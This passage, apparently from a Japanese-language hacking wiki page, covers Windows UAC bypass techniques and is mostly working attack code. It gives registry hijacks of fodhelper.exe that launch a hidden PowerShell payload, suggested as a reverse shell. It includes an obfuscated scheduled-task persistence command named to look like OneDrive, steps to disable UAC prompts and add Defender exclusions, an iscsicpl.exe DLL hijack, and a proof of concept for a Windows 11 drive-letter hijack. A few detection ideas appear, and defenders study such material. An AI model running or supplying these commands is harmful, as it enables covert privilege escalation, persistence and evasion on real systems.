1) Create the vulnerable key and values

New-Item -Path “HKCU:\Software\Classes\ms-settings\Shell\Open\command” -Force | Out-Null New-ItemProperty -Path “HKCU:\Software\Classes\ms-settings\Shell\Open\command” -Name “DelegateExecute” -Value “” -Force | Out-Null

2) Set default command to your payload (example: reverse shell or cmd)

Replace <BASE64_PS> with your base64-encoded PowerShell (or any command)

Set-ItemProperty -Path “HKCU:\Software\Classes\ms-settings\Shell\Open\command” -Name “(default)” -Value “powershell -ExecutionPolicy Bypass -WindowStyle Hidden -e <BASE64_PS>” -Force

3) Trigger auto-elevation

Start-Process -FilePath “C:\Windows\System32\fodhelper.exe”

4) (Recommended) Cleanup

Remove-Item -Path “HKCU:\Software\Classes\ms-settings\Shell\Open” -Recurse -Force

</details>
メモ:
- 現在のユーザーが Administrators のメンバーで、UAC level が default/lenient（Always Notify with extra restrictions ではない）場合に動作する。
- 64-bit Windows 上で 32-bit process から 64-bit PowerShell を起動するには `sysnative` path を使う。
- payload は任意の command（PowerShell、cmd、または EXE path）でよい。stealth のため、UI のプロンプトは避ける。

#### CurVer/extension hijack variant (HKCU only)

最近の `fodhelper.exe` を悪用する sample では `DelegateExecute` を使わず、代わりに per-user の `CurVer` value を介して **`ms-settings` ProgID を redirect** する。auto-elevated binary は依然として handler を `HKCU` 下で解決するため、keys を植えるのに admin token は不要である:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

昇格されると、malware は一般的に HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin を 0 に設定して 今後のプロンプトを無効化 し、その後さらに defense evasion（例: Add-MpPreference -ExclusionPath C:\ProgramData）を行い、high integrity で実行されるよう persistence を再作成します。典型的な persistence task では、XORで暗号化された PowerShell script を disk 上に保存し、毎時それを decode/execute します:

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

このバリアントはドロッパーをさらにクリーンアップし、ステージされたペイロードだけを残します。そのため検出は、CurVer hijack、ConsentPromptBehaviorAdmin の改ざん、Defender exclusion の作成、または PowerShell を in-memory で復号する scheduled tasks の監視に依存することになります。

さらなる UAC bypass

ここで使うすべての technique は、AUC を bypass するために被害者との完全な対話型シェルを必要とします（一般的な nc.exe shell だけでは不十分です）。

meterpreter session を使えば実現できます。Session 値が 1 の process に migrate します:

(explorer.exe が使えるはずです)

GUI を使った UAC Bypass

GUI にアクセスできるなら、UAC prompt が出たときにそのまま承認すればよく、実際には bypass はあまり必要ありません。つまり、GUI へのアクセスを得られれば UAC を bypass できます。

さらに、誰かが使っていた GUI session（RDP 経由の可能性あり）を得られた場合、administrator として実行されている tool がいくつかあり、たとえば https://github.com/oski02/UAC-GUI-Bypass-appverif のように、UAC に再度促されることなく admin として 直接 cmd などを run できることがあります。これは少しstealthy かもしれません。

noisy な brute-force UAC bypass

ノイズが出ても気にしないなら、いつでも https://github.com/Chainski/ForceAdmin のようなものを run して、user が許可するまで権限昇格を要求し続けることができます。

自分で bypass を作る - Basic UAC bypass methodology

UACME を見ると、ほとんどの UAC bypass は Dll Hijacking の vulnerability を悪用していることが分かります（主に悪意ある dll を C:\Windows\System32 に書き込む手口です）。Dll Hijacking vulnerability の見つけ方はここを読んでください。

1. autoelevate する binary を見つける（実行時に high integrity level で動くことを確認する）。
2. procmon で、DLL Hijacking の対象になりうる “NAME NOT FOUND” イベントを探す。
3. おそらく、書き込み権限のない protected paths（例: C:\Windows\System32）内に DLL を書き込む必要があります。これには次を使って回避できます:
4. wusa.exe: Windows 7,8, 8.1。保護された path 内へ CAB file の内容を展開できます（この tool は high integrity level で実行されるためです）。
5. IFileOperation: Windows 10.
6. DLL を protected path にコピーし、脆弱で autoelevated な binary を実行する script を用意する。

別の UAC bypass technique

autoElevated binary が registry から実行される binary や command の name/path を読み取ろうとするかを確認する方法です（特に、その binary がこの情報を HKCU 内で探す場合に有効です）。

SysWOW64\iscsicpl.exe + user PATH DLL hijack による UAC bypass

32-bit の C:\Windows\SysWOW64\iscsicpl.exe は auto-elevated な binary で、search order により iscsiexe.dll を load するよう悪用できます。悪意ある iscsiexe.dll を user-writable な folder に置き、さらに current user の PATH（たとえば HKCU\Environment\Path 経由）をその folder が検索されるように変更できれば、Windows は UAC prompt を表示せずに attacker の DLL を昇格した iscsicpl.exe process 内に load することがあります。

実用上の注意:

• これは current user が Administrators に属していても、UAC のために Medium Integrity で実行されている場合に有効です。
• この bypass で重要なのは SysWOW64 側の copy です。System32 側の copy は別 binary として扱い、挙動を個別に確認してください。
• この primitive は auto-elevation と DLL search-order hijacking の組み合わせなので、他の UAC bypass で使うのと同じ ProcMon の workflow が、missing DLL load の確認に役立ちます。

最小の flow:

copy iscsiexe.dll %TEMP%\iscsiexe.dll
reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe

Detection ideas:

• reg add / registry writes to HKCU\Environment\Path の直後に C:\Windows\SysWOW64\iscsicpl.exe の実行が続く場合に alert。
• %TEMP% や %LOCALAPPDATA%\Microsoft\WindowsApps のような user-controlled locations にある iscsiexe.dll を hunt。
• iscsicpl.exe の起動と、通常の Windows ディレクトリ外からの unexpected な child processes や DLL loads を相関分析する。

Administrator Protection (25H2) drive-letter hijack via per-logon-session DOS device map

Windows 11 25H2 の “Administrator Protection” は、shadow-admin tokens と per-session の \Sessions\0\DosDevices/<LUID> maps を使用する。ディレクトリは SeGetTokenDeviceMap により、最初の \?? resolution 時に遅延作成される。攻撃者が shadow-admin token を SecurityIdentification でのみ impersonate すると、ディレクトリは攻撃者を owner として作成され（CREATOR OWNER を継承する）、\GLOBAL?? より優先される drive-letter links を作成できる。

Steps:

1. low-privileged session から RAiProcessRunOnce を呼び出し、promptless な shadow-admin runonce.exe を起動する。
2. その primary token を identification token に duplicate し、\?? を open する際に impersonate して、攻撃者所有の \Sessions\0\DosDevices/<LUID> の作成を強制する。
3. そこに attacker-controlled storage を指す C: symlink を作成する。その session での後続の filesystem access は C: を attacker path に解決するため、prompt なしで DLL/file hijack が可能になる。

PowerShell PoC (NtObjectManager):

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"

References

• HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf) – fodhelper UAC bypass steps
• LOLBAS: Fodhelper.exe
• LOLBAS: Iscsicpl.exe
• Microsoft Docs – User Account Control の仕組み
• UACME – UAC bypass techniques collection
• Checkpoint Research – KONNI Adopts AI to Generate PowerShell Backdoors
• Check Point Research – Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets
• Project Zero – Windows Administrator Protection drive-letter hijack

Tip

AWS Hackingを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hackingを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)
Az Hackingを学び、実践する: HackTricks Training Azure Red Team Expert (AzRTE) HackTricks Trainingの全カタログ を閲覧して、評価トラック（ARTA/GRTA/AzRTA）と Linux Hacking Expert (LHE) を確認してください。

HackTricksをサポート

• subscription plans を確認してください!
• 💬 Discord group、telegram group に参加し、X/Twitterで @hacktricks_live をフォローするか、LinkedIn page と YouTube channel を確認してください。
• HackTricks と HackTricks Cloud の github repos に PR を送信して hacking tricks を共有してください。